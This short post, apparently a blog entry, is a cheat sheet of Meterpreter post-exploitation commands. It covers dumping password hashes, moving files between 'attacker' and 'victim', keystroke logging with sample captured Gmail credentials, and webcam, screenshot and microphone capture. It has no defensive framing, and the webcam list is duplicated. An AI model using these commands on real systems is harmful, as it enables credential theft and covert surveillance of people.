Useful Meterpreter Commands:

Basic Commands:
getuid - print the user details
getpid - print the process number
ps - list running processes
migrate - session upgrader
cd - change directory
mv - move
cp - copy
ls/dir - list files
mkdir -  make a directory
rmdir - delete a folder
rm - delete a file
cat - read contents
sysinfo - print system information
getprivs - print user's privilleges
shell - cmd environment instead meterpreter
background - send the session to background
exit - exit from session
kill - kill a process or a job
screenshot - Take a screenshot from the victim PC
upload - upload files from the attacker to the victim
download - download files from the victim to the attacker
hashdump - Dumps the contents of the SAM database

Keyboard Recorder:
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
www.gmail.com <Return>testuser <Return> 1234


Webcam Commands:
record_mic - Record audio from the default microphone
webcam_chat - Start a video chat
webcam_list - List webcams
webcam_snap - Take a snapshot from the specified webcam
webcam_stream - Play a video stream from the specified webcam
webcam_chat - Start a video chat
webcam_list - List webcams
webcam_snap - Take a snapshot from the specified webcam
webcam_stream - Play a video stream from the specified webcam

Share To:

Fabio Lior Rahamim